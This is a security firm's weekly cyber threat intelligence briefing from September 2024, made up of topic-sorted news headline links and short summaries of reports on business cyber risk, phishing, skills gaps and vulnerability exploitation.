UNC1860 provides Iran-linked APTs with access to Middle Eastern networks (securityaffairs.com)
Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)
Concealed Fox Kitten infrastructure exposed | SC Media (scworld.com)
Sweden blames Iran for cyber-attack after Quran-burnings - BBC News
Iranian-linked election interference operation shows signs of recent access | CyberScoop
North Korea
Mandiant gives tips on catching North Korean IT operatives • The Register
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Did Israel infiltrate Lebanese telecoms networks? (securityaffairs.com)
ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)
Tools and Controls
Preparing to fail is a vital part of cyber security - Ian McGowan (scotsman.com)
AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru
Less Than Half of AI Users Trained on Security and (globenewswire.com)
MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security
Cloud Exit: 42% of Companies Move Data Back On-Premises - Techopedia
Why threat intelligence is essential to consolidated security | SC Media (scmagazine.com)
Mastercard's Bet on Recorded Future a Win for CTI (darkreading.com)
New cyber security advisory highlights defence-in-depth strategies (securityintelligence.com)
Combating phishing attacks through awareness and simulation | Cybernews
Developing an effective cyber warfare response plan - Help Net Security
Active Directory compromise: Cyber Security agencies provide guidance - Help Net Security
Keep Tier-One Applications Out of Virtual Environments (darkreading.com)
Boredom Is the Silent Killer in Your IT Systems (darkreading.com)
When technical debt strikes the security stack | CSO Online
What Does Platformization Mean for MSSPs and MDRs? | MSSP Alert
What Is Cyber Threat Hunting? (techrepublic.com)
Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)
65% of websites are unprotected against simple bot attacks - Help Net Security
CrowdStrike exec to apologize for faulty update that caused global IT outage (yahoo.com)
Securing non-human identities: Why fragmented strategies fail - Help Net Security
Kaspersky users shocked by automatic antivirus replacement without explicit permission | Cybernews
Offensive cyber operations are more than just attacks - Help Net Security
Privacy And API Security: What’s At Stake? (informationsecuritybuzz.com)
How automated red teaming can improve your cyber security | Tech Donut
Move over, Cobalt Strike, there's a new post-exploit tool • The Register
Other News
Small doesn’t mean safe: how SMEs are under attack (smh.com.au)
Digital security is everyone's concern – Daily Business Magazine (dailybusinessgroup.co.uk)
Microsoft Trims Cloud Cyber Attack Surface (darkreading.com)
How Microsoft Is Beefing Up Security With 34,000 Engineers (databreachtoday.co.uk)
Microsoft CEO to cyber team: Don’t tell me how great everything is | The Seattle Times
Are You Sabotaging Your Cyber Security Posture? - Security Boulevard
Cyber security threats target healthcare - SiliconANGLE
ISO - Healthcare cyber security: Diagnosing risks, prescribing solutions
5 Cyber Security Threats Every Startup Should Know | LevelBlue (att.com)
Google, Apple and the antitrust tipping point (ft.com)
10 security bugs put fuel storage tanks at risk of attacks • The Register
6 Cyber Security Headaches Sporting Events Suffer (darkreading.com)
A lesson in cyber threats: Building resilient networks in education | theHRD (thehrdirector.com)
Vulnerability Management
Microsoft ends development of Windows Server Update Services (WSUS) (bleepingcomputer.com)
Windows Server 2025 gets hotpatching option, without reboots - Help Net Security
Boredom Is the Silent Killer in Your IT Systems (darkreading.com)
When technical debt strikes the security stack | CSO Online
EPSS vs. CVSS: What's the Best Approach to Vulnerability Prioritization? (thehackernews.com)
60% of vulnerabilities were leveraged against Microsoft Exchange | Security Magazine
Vulnerabilities
Zero-Click MediaTek Bug Opens Phones, Wi-Fi to Takeover (darkreading.com)
Doomsday 9.9 unauthenticated RCE bug affects 'all Linux' • The Register
Critical Linux bug is CUPS-based remote-code execution hole • The Register
Cisco Patches High-Severity Vulnerabilities in IOS Software - SecurityWeek
Critical Ivanti vTM auth bypass bug now exploited in attacks (bleepingcomputer.com)
Third Recent Ivanti Vulnerability Exploited in the Wild - SecurityWeek
Citrix Releases Security Updates for XenServer and Citrix Hypervisor | CISA
HPE patches three critical flaws in Aruba software • The Register
Researcher reveals ‘catastrophic’ security flaw in the Arc browser - The Verge
Versa Networks Releases Advisory for a Vulnerability in Versa Director, CVE-2024-45229 | CISA
CERT/CC Warns of Unpatched Critical Vulnerability in Microchip ASF - SecurityWeek
ESET Patches Privilege Escalation Vulnerabilities in Windows, macOS Products - SecurityWeek
FreeBSD Hypervisor Vulnerability Lets Attackers Execute Malicious Code (cybersecuritynews.com)
60% of vulnerabilities were leveraged against Microsoft Exchange | Security Magazine
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 20 September 2024
Black Arrow Cyber Threat Intelligence Briefing 20 September 2024:
-Cyber Threats and AI Disruption Top Business Risks for 2024
-Half of UK Firms Lack Basic Cyber Security Skills
-Beyond A Buzzword: What Resilience in Cyber Really Means
-Do Boards Understand Their New Role in Cyber Security?
-All Smoke, No Fire: The Bizarre Trend of Fake Data Breaches and How to Protect Against Them
-Threat Actors Continue to Utilise HR-Related Phishing Tactics
-80% of Organisations Experienced an Email-Related Security Breach in the Last Year
-The Growing Danger of Visual Hacking and How to Protect Against It
-Cyber Warfare: A Growing Concern for the British Public
-The Rising Cost of Vulnerable APIs and Bot Attacks – A $186 Billion Wake-Up Call for Businesses
-Attackers are Exploiting Vulnerabilities at a Record Pace—Here’s What to Do About It
-What Can Businesses Learn from the Rise of Cyber Espionage?
-When Startup Founders Should Start Thinking About Cyber Security
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Cyber Threats and AI Disruption Top Business Risks for 2024
Global law firm Clyde & Co's latest corporate risk radar report highlights that 76% of business leaders now view cyber threats as their primary technological concern. Regulatory scrutiny is considered a growing operational threat by 43% of leaders, due to an influx of new initiatives and inconsistent regulations. People-related challenges rank as the second-highest impact risk, identified by 58% of leaders as a threat to multinational operations. Notably, climate change has dropped from sixth to ninth in the global risk hierarchy, reflecting the increased urgency of other issues. Additionally, 29% of business leaders have identified disruption caused by artificial intelligence as a significant high-impact risk for the first time. The report emphasises the need for comprehensive risk planning and employee training to enhance security and resilience in today's volatile environment.
Half of UK Firms Lack Basic Cyber Security Skills
Recent government findings indicate that 44% of UK businesses have skills gaps in basic technical cyber security areas. Among the 637,000 businesses examined, 27% lack advanced skills such as penetration testing. Incident management skills gaps have risen sharply from 27% in 2020 to 48% in 2024. The Department for Science, Innovation & Technology (DSIT) reported that despite increased supply, a significant skills gap persists. Nearly half of businesses who do not outsource incident management are not confident in handling a cyber security breach. Employers and recruiters also believe that AI will impact the cyber skills landscape, potentially leading to job losses due to automation and a need for new skills to work with AI tools.
Beyond A Buzzword: What Resilience in Cyber Really Means
Cyber resilience is now essential for organisations of all sizes, as cyber attacks have become inevitable. Resilience involves not only preventing breaches but also minimising damage and swiftly restoring operations, requiring a shift towards adaptive threat management with quick detection and response. This year’s International Cyber Expo Global Cyber Summit highlighted that leaders are focusing on integrating employees into security frameworks and policies, as well as fostering a supportive work environment to prevent burnout among cyber security professionals. Diversity and community were noted as key factors in building resilient teams capable of innovative problem-solving. Achieving true cyber resilience is a balancing act between protecting organisational assets and ensuring the wellbeing of the workforce.
Do Boards Understand Their New Role in Cyber Security?
Research reveals that over 90% of cyber security incidents originate from human action, underscoring the critical role of boards in governing cyber security risk. However, many board members view cyber security as a purely technical issue, overly focusing on tools rather than strategic oversight. Boards are encouraged to upskill on cyber risks, strategically prioritising investments and understanding their roles in incident response. Boards are advised to seek external assessments of their cyber recovery plans, much like financial audits, to enhance preparedness. Additionally, boards are adjusting member selection criteria to include technology expertise that addresses both security and strategic opportunities. Understanding that technology safeguards critical data and automates business processes, boards must integrate cyber security into their core business strategy.
All Smoke, No Fire: The Bizarre Trend of Fake Data Breaches and How to Protect Against Them
Organisations are increasingly facing fake data breach claims from cyber criminals, causing unnecessary panic and resource diversion. These hoaxes can damage a company's reputation and erode customer trust, even when no actual breach has occurred. Experts advise implementing advanced security measures and establishing dedicated teams to verify breach claims before reacting publicly. Effective communication strategies are crucial to manage public perception and maintain control over the narrative. Continuous employee training and updated security protocols are essential to mitigate both real and fake cyber threats, safeguarding the organisation's reputation and customer confidence.
Threat Actors Continue to Utilise HR-Related Phishing Tactics
Phishing attacks are becoming increasingly sophisticated, with recent tactics continuing the trend of impersonating company HR departments to deceive employees. One notable campaign sent emails urging staff to review a revised employee handbook, using professional language and creating a sense of urgency to prompt immediate action. These emails directed recipients to fake login pages designed to capture sensitive credentials. Such attacks exploit trust and fear of non-compliance, emphasising the need for robust cyber security measures. Organisations are advised to implement advanced email security solutions and enhance user awareness training. A multi-layered defence approach, combining technology and vigilant employees, is essential to protect against these evolving phishing threats.
Report: 80% of Organisations Experienced an Email-Related Security Breach in the Last Year
The latest report from a cyber security solutions provider reveals that email-related threats are a top concern for critical infrastructure organisations. The study found that 80% of these entities experienced an email-related security breach in the past year, and 63% admit their email security needs improvement. Despite advancements in cyber security, nearly half of the organisations lack confidence in their current email defences, leaving them vulnerable to cyber attacks. 65% are not compliant with regulatory standards, exposing them to significant operational and business risks. The report highlighted that essential security measures like Content Disarm and Reconstruction (CDR) and URL scanning are missing in many organisations' defences. This underscores the urgent need to adopt a zero-trust mindset and strengthen prevention-based perimeter defence strategies.
The Growing Danger of Visual Hacking and How to Protect Against It
Visual hacking is a significant threat that many organisations overlook in their data security strategies. Despite focusing on cyber security within systems, physical methods like shoulder surfing can bypass these defences, exposing sensitive information. Physical barriers such as privacy screens are highly effective, blocking up to 99.8% of visible light at angles beyond 45 degrees, ensuring only the primary user can view the screen. Traditional privacy screens have drawbacks like increased device thickness and permanent privacy modes, impacting usability. Switchable privacy screens built into devices are gaining popularity, offering automated and software-controlled privacy without hindering functionality. Organisations are advised to adopt these advanced privacy measures to prevent unauthorised visual access and enhance overall data security.
Cyber Warfare: A Growing Concern for the British Public
New research by the International Cyber Expo reveals that over 70% of Britons believe cyber warfare is the next frontier in modern combat. Cyber attacks targeting critical infrastructure are the top concern, with 54% of respondents expressing worry. Nearly a third (31%) of the public admit feeling scared about the prospect of cyber warfare, and 43% are concerned about nation-state activities. The survey highlighted that despite government investments in traditional military forces, the majority perceive cyberspace as the emerging battlefield. Experts emphasise the need for increased awareness, preparedness, and investment in cyber security to protect critical infrastructure and national security.
The Rising Cost of Vulnerable APIs and Bot Attacks – A $186 Billion Wake-Up Call for Businesses
A recent report by a cyber security solutions provider, Imperva, has found that vulnerable APIs and automated bot attacks are causing significant financial losses for businesses, with an estimated annual economic burden of up to $186 billion. An API, or Application Programming Interface, is like a bridge that allows different software applications to talk to each other and share information. A bot is a computer program that performs tasks automatically, often mimicking human actions. The study, which analysed over 161,000 cyber security incidents, revealed that the average enterprise managed 613 API endpoints in 2023, making them increasingly attractive targets for cybercriminals. Bot-related security incidents have surged dramatically, rising by 88% in 2022 and a further 28% in 2023. Insecure APIs alone have led to up to $87 billion in losses annually, marking a $12 billion increase from 2021. Automated API abuse by bots contributes significantly to this impact, costing organisations up to $17.9 billion each year. The report underscores the urgent need for robust security measures to protect against these growing threats.
Attackers are Exploiting Vulnerabilities at a Record Pace—Here’s What to Do About It
Recent findings show that attackers are exploiting vulnerabilities faster than ever, with the average time to exploitation now just 4.76 days—a 43% increase in speed compared to earlier this year. This rapid escalation emphasises the critical need for timely patching, yet 86% of breaches occurred through known vulnerabilities with available patches. 98% of organisations reported detecting exploits of vulnerabilities over five years old, underscoring the importance of strong cyber hygiene practices. Experts advise prioritising vulnerabilities actively under attack and ensuring robust incident response plans. Collaboration between public and private sectors is deemed essential to enhance cyber security and stay ahead of evolving threats.
What Can Businesses Learn from the Rise of Cyber Espionage?
Cyber espionage is becoming a critical concern for businesses, as state-sponsored attacks increasingly target the private sector to disrupt economies and access confidential information. The UK GCHQ estimates that at least 34 nation-states now have advanced cyber espionage teams. The rise of AI technologies has amplified these threats, with attackers using tools like large language models to enhance their capabilities. Attacks on major cloud providers pose significant risks due to their impact on software supply chains. While AI introduces new risks, it is also essential for improving threat detection and response. Organisations are urged to adopt zero trust architectures, conduct regular security audits, and strategically incorporate AI to protect against sophisticated cyber threats.
When Startup Founders Should Start Thinking About Cyber Security
A recent discussion has highlighted that cyber security risks pose a significant threat to startups, yet many founders prioritise rapid growth over security measures. Advanced persistent threats like China's Volt Typhoon have begun targeting startups, with one such attack breaching Versa Networks after exploiting a high-severity vulnerability. According to a survey by a business insurance company, over two-thirds of startup founders have experienced a cyber attack, with 86% owning some form of cyber insurance and 71% considering additional security measures. Despite this, investors seldom prioritise cyber security during negotiations, but the consequences of neglecting it can be catastrophic. Experts suggest that as startups expand, the importance of cyber security increases, and founders should integrate security planning from the outset to mitigate risks.
Sources:
https://www.infosecurity-magazine.com/news/half-of-uk-firms-lack-basic/
https://www.itsecurityguru.org/2024/09/19/beyond-a-buzzword-what-resilience-in-cyber-really-means/
https://www.cio.com/article/3523667/do-boards-understand-their-new-role-in-cybersecurity.html
https://securityboulevard.com/2024/09/threat-actors-continue-to-utilize-hr-related-phishing-tactics/
https://www.helpnetsecurity.com/2024/09/17/robert-ramsey-rain-technology-visual-hacking/
https://www.itsecurityguru.org/2024/09/19/cyber-warfare-a-growing-concern-for-the-british-public/
https://securityintelligence.com/articles/what-can-businesses-learn-from-rise-of-cyber-espionage/
https://www.darkreading.com/cybersecurity-operations/cybersecurity-influence-startup-investment
Governance, Risk and Compliance
The alarming gap between perception and reality in the corner office | TechRadar
Over Half of Breached UK Firms Pay Ransom - Infosecurity Magazine (infosecurity-magazine.com)
Nearly half of UK businesses unequipped to face cyber attacks, Ipsos finds (holyrood.com)
Half of UK Firms Lack Basic Cybersecurity Skills - Infosecurity Magazine (infosecurity-magazine.com)
Do boards understand their new role in cybersecurity? | CIO
Closing the gap between cyber risk strategy and execution (betanews.com)
Beyond A Buzzword: What Resilience in Cyber Really Means - IT Security Guru
Palo Alto Networks CEO says cybersecurity has ‘become an arms race’ – BNN Bloomberg
99% of Business Leaders Are Concerned About Internal Data (darkreading.com)
Fines and lawsuits after data breaches ‘worse than the attack itself’ (foodmanufacture.co.uk)
Better metrics can show how cybersecurity drives business success | CSO Online
It's Time To Dismantle The Long Held Silos Between Security And Tech Teams (forbes.com)
The Cybersecurity Landscape: New Threats, Same Mistakes (darkreading.com)
The Cost Of Inaction: How Breached Organisations Are Redefining Cyber Resilience | Scoop News
Companies aren't 'owning' their data (betanews.com)
SecOps' new frontier in the remote work era: HR | TechTarget
Only 1/3 of businesses have 24/7 security coverage, survey finds | SC Media (scmagazine.com)
Modernization: Nothing to fear except failing to future-proof | ITPro
Striking the balance between cybersecurity and operational efficiency - Help Net Security
What can businesses learn from the rise of cyber espionage? (securityintelligence.com)
Want to get ahead? Four activities that can enable a more proactive security regime | CSO Online
Protecting Critical Data and Infrastructure in the Digital Age | Entrepreneur
The ripple effects of regulatory actions on CISO reporting - Help Net Security
Citigroup strips COO of responsibility for data overhaul after $136mn fine
Threats
Ransomware, Extortion and Destructive Attacks
Over Half of Breached UK Firms Pay Ransom - Infosecurity Magazine (infosecurity-magazine.com)
Top 10 ransomware groups to watch | CSO Online
Infostealers: An Early Warning for Ransomware Attacks (darkreading.com)
Infostealers Cause Surge in Ransomware Attacks - Infosecurity Magazine (infosecurity-magazine.com)
Ransomware attacks: Rising threats and increasing demands - SiliconANGLE
Ransomware attacks are soaring to a new high | TechRadar
Medusa Ransomware Exploiting Fortinet Flaw For Sophisticated Attacks (cybersecuritynews.com)
Gen reveals 24% rise in ransomware attacks on consumers (securitybrief.co.nz)
Ransomware gangs now abuse Microsoft Azure tool for data theft (bleepingcomputer.com)
75 percent of organizations affected more than once by ransomware (betanews.com)
Germany seizes 47 crypto exchanges used by ransomware gangs (bleepingcomputer.com)
What more can be done to stop ransomware attacks? | CyberScoop
Defending Against Ransomware Threats: Tactics and Procedures Revealed by CISA (cimcor.com)
For ransomware, universities are paying more | EdScoop
Vanilla Tempest hackers hit healthcare with INC ransomware (bleepingcomputer.com)
Four ways to stay ahead of the ransomware threat | SC Media (scmagazine.com)
Ransomware Victims
Over Half of Breached UK Firms Pay Ransom - Infosecurity Magazine (infosecurity-magazine.com)
Qilin ransomware attack on Synnovis impacted over 900K patients (securityaffairs.com)
UnitedHealth CISO: We had to ‘start over’ after ransomware attack (cyberscoop.com)
Ascension Suffered $1.3 Billion Hit From Cyberattack, Analysis Finds - KFF Health News
LockBit boasts once again of ransoming eFile.com • The Register
Valencia Ransomware crew 'hits' California city and more • The Register
Vice Society Uses Inc Ransomware in Healthcare Attack (darkreading.com)
Data Stolen in Ransomware Attack That Hit Seattle Airport - SecurityWeek
Rhysida ships off Port of Seattle data for $6M • The Register
German radio station forced to broadcast 'emergency tape' following cyberattack (therecord.media)
Ransomware Group Leaks Data Allegedly Stolen From Kawasaki Motors - SecurityWeek
88,000 Impacted by Access Sports Data Breach Resulting From Ransomware Attack - SecurityWeek
Phishing & Email Based Attacks
Threat Actors Continue to Utilize HR-Related Phishing Tactics - Security Boulevard
Email Attacks a Problem for National Infrastructure Companies (techrepublic.com)
How hackers are using legitimate tools to distribute phishing links | ITPro
Cybercriminals exploit content platforms for phishing attacks (securitybrief.co.nz)
What is email spam and how to fight it? | Definition from TechTarget
North Korean APT Bypasses DMARC for Cyber Espionage (darkreading.com)
DoJ accuses Chinese national of phishing for military code • The Register
Advanced Phishing Attacks Put X Accounts at Risk - Infosecurity Magazine (infosecurity-magazine.com)
What Is Phishing-Resistant MFA and How Does it Work? - Security Boulevard
Other Social Engineering
The growing danger of visual hacking and how to protect against it - Help Net Security
Security Firm's North Korean Hacker Hire Not Unique (darkreading.com)
Windows users targeted with fake human verification pages delivering malware - Help Net Security
New North Korean Social Engineering Campaign Targets Crypto Sector | MSSP Alert
Artificial Intelligence
How are cybercriminals upskilling to make the most of AI? - Raconteur
Companies skip security hardening in rush to adopt AI | CSO Online
The AI Threat: Deepfake or Deep Fake? Unraveling the True Security Risks - SecurityWeek
Security leaders consider banning AI coding due to security risks - Help Net Security
OODA Loop - Attacker VS Defender. Who Will Win the Race to Best Operationalize AI?
Orca: AI services, models falling short on security | TechTarget
Hacker tricks ChatGPT into giving out detailed instructions for making homemade bombs | TechCrunch
Is that photo real or AI? Google's 'About this image' aims to help you tell the difference | ZDNET
Compliance frameworks and GenAI: The Wild West of security standards - Help Net Security
2FA/MFA
How MFA gets hacked — and strategies to prevent it | CSO Online
What Is Phishing-Resistant MFA and How Does it Work? - Security Boulevard
Malware
Infostealers: An Early Warning for Ransomware Attacks (darkreading.com)
Infostealers Cause Surge in Ransomware Attacks - Infosecurity Magazine (infosecurity-magazine.com)
This Harry Potter-Named Attack Runs Fileless Malware (makeuseof.com)
Espionage Alert: Google Sheets Exploit For Malware Control - Security Boulevard
This Windows Tool Can Let In Viruses Without Detection (makeuseof.com)
Hackers Force Chrome Users To Hand Over Google Passwords, Here’s How (forbes.com)
CISA warns of Windows flaw used in infostealer malware attacks (bleepingcomputer.com)
1.3 million Android-based TV boxes backdoored; researchers still don’t know how | Ars Technica
'SambaSpy' RAT's Multiple Features Pack Hefty Punch (darkreading.com)
Windows users targeted with fake human verification pages delivering malware - Help Net Security
Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users (thehackernews.com)
Bots/Botnets
Chinese Spies Built Massive Botnet of IoT Devices to Target US, Taiwan Military - SecurityWeek
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide (thehackernews.com)
FBI director says Chinese spies 'burned down' their botnet • The Register
Study: Bots pose major online fraud threat | Chain Store Age
Five Eyes alliance seizes control of extensive spy tech network used by China | TechRadar
How to detect and stop bot activity - Help Net Security
Mobile
14 dead as Hezbollah walkie-talkies explode in second, deadlier attack | Ars Technica
11 dead, thousands injured in explosive supply chain attack on Hezbollah pagers | Ars Technica
Mass pager attack in Lebanon raises concerns over cyber warfare and terrorism · Global Voices
Securing your smartphone: Vital steps to protect your digital assets | TechRadar
Android to be getting its own version of Apple's "Stolen Device Protection" feature - PhoneArena
Watch out! These 9 online banking scams drain your accounts | PCWorld
Here's How to Remotely Disable Your Smartphone If It's Stolen (makeuseof.com)
Denial of Service/DoS/DDOS
Financial services sector remains top DDoS target, Akamai reports (securitybrief.co.nz)
Internet of Things – IoT
Malware has infected 1.3 million Android TV boxes in 197 countries | TechSpot
Chinese Spies Built Massive Botnet of IoT Devices to Target US, Taiwan Military - SecurityWeek
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide (thehackernews.com)
NCSC exposes Chinese company running malicious Mirai botnet | Computer Weekly
FBI director says Chinese spies 'burned down' their botnet • The Register
Data Breaches/Leaks
Fortinet confirms breach that likely leaked 440GB of customer data | CSO Online
Cybersecurity company Fortinet suffers third-party data breach (techmonitor.ai)
23andMe to pay $30 million in genetics data breach settlement (bleepingcomputer.com)
Hackers steal nearly 1.7 million credit card numbers in breach | Mashable
After yet another data breach, how can you protect yourself? (thehill.com)
AT&T agrees to $13 million fine for third-party cloud breach | CyberScoop
This Dating App May Have Leaked Extremely Private Data: Check Your Account Now (makeuseof.com)
Over 1,000 ServiceNow instances found leaking corporate KB data (bleepingcomputer.com)
Temu denies breach after hacker claims theft of 87 million data records (bleepingcomputer.com)
Hackers steal iCloud photos through calendar invites -- no clicks required (appleinsider.com)
Construction firms breached in brute force attacks on accounting software (bleepingcomputer.com)
RansomHub claims Kawasaki cyberattack, threatens to leak stolen data (bleepingcomputer.com)
88,000 Impacted by Access Sports Data Breach Resulting From Ransomware Attack - SecurityWeek
Organised Crime & Criminal Actors
Violent cyber criminals to spend collective 191 years in prison • The Register
Ticketmaster boss who repeatedly hacked rival firm sentenced (bitdefender.com)
'Marko Polo' Creates Globe-Spanning Cybercrime Juggernaut (darkreading.com)
Criminals Keep Hacking Themselves, Letting Researchers Unmask Them (404media.co)
Europol takes down "Ghost" encrypted messaging platform used for crime (bleepingcomputer.com)
The Dark Web Demystified: Its Role In Privacy, Crime, And Regulation – Analysis – Eurasia Review
Tor says it’s "still safe" amid reports of police deanonymizing users (bleepingcomputer.com)
Suspects behind $230 million cryptocurrency theft arrested in Miami (bleepingcomputer.com)
Australian Police conducted supply chain attack on crime app • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users (thehackernews.com)
Cryptojacking Gang TeamTNT Make a Comeback - Infosecurity Magazine (infosecurity-magazine.com)
Germany seizes 47 crypto exchanges used by ransomware gangs (bleepingcomputer.com)
Suspects behind $230 million cryptocurrency theft arrested in Miami (bleepingcomputer.com)
Tether and Others Freeze Millions Tied to Lazarus Group Wallets - DailyCoin
New North Korean Social Engineering Campaign Targets Crypto Sector | MSSP Alert
Insider Risk and Insider Threats
Insider threats highlighted, calls for enhanced security measures (securitybrief.co.nz)
How to reduce cyber risk during employee onboarding (bleepingcomputer.com)
Insurance
How Cyber Insurance Shifts Affect the Security Landscape (darkreading.com)
Why Breaking Down Silos Is Key To Optimizing Cyber Insurance Investments
How NIS2 Directive Impacts Businesses and Cyber Insurance (kingsbridge.co.uk)
Supply Chain and Third Parties
How Mega Attacks Are Spotlighting Critical 3rd-Party Risks (govinfosecurity.com)
Qilin ransomware attack on Synnovis impacted over 900K patients (securityaffairs.com)
The ‘Sleeping Time Bomb’ of Third-Party Cybersecurity Risk | Decipher (duo.com)
Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel - SecurityWeek
Fortinet confirms data breach, extortion demand | TechTarget
Why Strong Cybersecurity is the Key to Unlocking the Full Potential of Supply Chains | Entrepreneur
Third-party risk management can learn a lot from the musk ox | CSO Online
Construction firms breached in brute force attacks on accounting software (bleepingcomputer.com)
Concerns Over Supply Chain Attacks on US Seaports Grow (darkreading.com)
Cloud/SaaS
Cloud-Native Network Security Up 17%, Hardware Down 2% (darkreading.com)
Ransomware gangs now abuse Microsoft Azure tool for data theft (bleepingcomputer.com)
AT&T agrees to $13 million fine for third-party cloud breach | CyberScoop
RCE Flaw in Google Cloud Affected Millions of Servers (darkreading.com)
Hackers steal iCloud photos through calendar invites -- no clicks required (appleinsider.com)
How to stop hackers attacking hybrid clouds | ITPro
Outages
1 in 10 firms dump infosec wares after Crowstrike outage • The Register
Post-CrowdStrike Fallout: Microsoft Redesigning EDR Vendor Access to Windows Kernel - SecurityWeek
Will Microsoft Rethink Windows Security? (govinfosecurity.com)
Cloudflare outage cuts off access to websites in some regions (bleepingcomputer.com)
Identity and Access Management
Gateways to havoc: Overprivileged dormant service accounts - Help Net Security
The proliferation of non-human identities - Help Net Security
Beyond human IAM: The rising tide of machine identities - Help Net Security
Encryption
Tor says it’s "still safe" amid reports of police deanonymizing users (bleepingcomputer.com)
Google Chrome Switches to ML-KEM for Post-Quantum Cryptography Defense (thehackernews.com)
Linux and Open Source
What is open-source and how does it benefit you? | ZDNET
Government unveils open-source security steps (baselinemag.com)
Passwords, Credential Stuffing & Brute Force Attacks
TfL requires in-person password resets for 30,000 employees after hack (bleepingcomputer.com)
Why Hackers Aren't Stopped by Account Lockouts | HackerNoon
Hackers Force Chrome Users To Hand Over Google Passwords, Here’s How (forbes.com)
Malware locks browser in kiosk mode to steal Google credentials (bleepingcomputer.com)
Over 2 million VPN passwords have been stolen – here's what you can do about it | TechRadar
Understanding Credential Stuffing Attacks - Security Boulevard
Construction firms breached in brute force attacks on accounting software (bleepingcomputer.com)
Social Media
France uses tough, untested cybercrime law to target Telegram's Durov | Reuters
British MPs and international organisations hacked on X | X | The Guardian
LinkedIn's new search filter aims to protect you from suspicious job postings | ZDNET
Instagram makes 'Teen Accounts' private by default - and AI will be checking your age | ZDNET
Facebook Hit With Class Action Over Spate of Hacked Accounts (bloomberglaw.com)
Meta to Train AI Models Using Public U.K. Facebook and Instagram Posts (thehackernews.com)
Advanced Phishing Attacks Put X Accounts at Risk - Infosecurity Magazine (infosecurity-magazine.com)
Training, Education and Awareness
Regulations, Fines and Legislation
Fines and lawsuits after data breaches ‘worse than the attack itself’ (foodmanufacture.co.uk)
France uses tough, untested cybercrime law to target Telegram's Durov | Reuters
AT&T agrees to $13 million fine for third-party cloud breach | CyberScoop
5 new cybersecurity regulations businesses should know about | MIT Sloan
Citigroup strips COO of responsibility for data overhaul after $136mn fine
The ripple effects of regulatory actions on CISO reporting - Help Net Security
Compliance frameworks and GenAI: The Wild West of security standards - Help Net Security
How NIS2 Directive Impacts Businesses and Cyber Insurance (kingsbridge.co.uk)
Models, Frameworks and Standards
How NIS2 Directive Impacts Businesses and Cyber Insurance (kingsbridge.co.uk)
Data Protection
Careers, Working in Cyber and Information Security
Cyber workforce must almost double to meet global talent need | Computer Weekly
Cyber workforce size stalls despite skills shortages (betanews.com)
UK convenes global coalition to boost cyber skills and tackle growing threats - GOV.UK (www.gov.uk)
The cybersecurity workforce of the future requires diverse hiring practices - Help Net Security
Only 1/3 of businesses have 24/7 security coverage, survey finds | SC Media (scmagazine.com)
Law Enforcement Action and Take Downs
Violent cyber scum to spend collective 191 years in prison • The Register
France uses tough, untested cybercrime law to target Telegram's Durov | Reuters
Tor insists its safe after cops convict CSAM site admin • The Register
Ticketmaster boss who repeatedly hacked rival firm sentenced (bitdefender.com)
UK activists file complaint with police against NSO Group • The Register
Tor says it’s "still safe" amid reports of police deanonymizing users (bleepingcomputer.com)
Europol takes down "Ghost" encrypted messaging platform used for crime (bleepingcomputer.com)
Suspects behind $230 million cryptocurrency theft arrested in Miami (bleepingcomputer.com)
Australian Police conducted supply chain attack on crime app • The Register
Misinformation, Disinformation and Propaganda
Putin really wants to put Trump back in the White House • The Register
US accuses RT, others of covert arms dealing, global influence operations | CyberScoop
Malicious Actors Sow Discord With Election Compromise Claims (darkreading.com)
FBI, CISA Warn of Fake Voter Data Hacking Claims - SecurityWeek
44% of people report believing election-related misinformation - Adobe study | ZDNET
Russian threat groups shift attention to Harris-Walz campaign, researchers find | CyberScoop
Russian troll farms turn up heat on presidential candidates | SC Media (scmagazine.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Mass pager attack in Lebanon raises concerns over cyber warfare and terrorism · Global Voices
Cyber Warfare: A Growing Concern for the British Public - IT Security Guru
What can businesses learn from the rise of cyber espionage? (securityintelligence.com)
Espionage Alert: Google Sheets Exploit For Malware Control - Security Boulevard
Nation State Actors
China
Did a Chinese University Hacking Competition Target a Real Victim? | WIRED
Chinese Spies Built Massive Botnet of IoT Devices to Target US, Taiwan Military - SecurityWeek
Chinese spies spent 4 months in aerospace firm’s server • The Register
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide (thehackernews.com)
FBI director says Chinese spies 'burned down' their botnet • The Register
China suspected of hacking diplomatic body for Pacific islands region (therecord.media)
DoJ accuses Chinese national of phishing for military code • The Register
